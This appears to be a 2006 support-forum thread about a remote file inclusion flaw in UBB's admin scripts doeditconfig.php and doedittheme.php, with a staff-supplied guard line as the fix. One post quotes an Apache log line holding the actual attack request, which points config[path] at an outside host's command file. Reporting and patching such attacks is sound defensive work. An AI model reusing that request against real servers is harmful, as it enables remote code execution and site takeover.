There is a flaw in doedittheme.php and doeditconfig.php. The symptom is that the config.inc.php gets mostly truncated and the board is blank because it can't connect to the DB. The appropriate line in the apache log is: 158.39.35.18 - - [30/Sep/2006:00:29:13 -0700] "GET /ubb/admin/doeditconfig.php?thispath=../includes&config[path]=http://abok.us/cmd .gif? HTTP/1.1" 200 171 "-" "libwww-perl/5.65"
and
It also takes place with doedittheme as well. This is being run from multiple locations. We had a different one from spain with as well. I'm running 6.5.1 with the other security hold fixed manually. I'll update to 6.5.5, but I didn't see anything to indicate that this is fixed in the update.
This was fixed in either 6.5.4 or 6.5.5. Basically each of these scripts needs this line at the top after the block of header comments. This keeps these scripts from being called directly.
if (!defined('IS_ADMIN')) exit;
You probably got hit from multiple locations because this was reposted on bugtraq yesterday. It's the same description of the exploit that was posted a few months back when we put out 6.5.4 and 6.5.5.
Ah - yeah, I've had 4 or 5 clients hit with this today, this explains why the hacks are coming out of the woodwork. Thanks for the fix. <img src="https://www.ubbcentral.com/boards/images/graemlins/wink.gif" alt="" />
6.5.5?? The "Version notes" on the website only go up to 6.5.2, which is what we're running - have these not been updated? We've been hit with this same exploit.
It looks like the version notes haven't been updated. We did send out an email to all of our customers trying to make sure that everyone got notified of the problem and that an upgrade was available.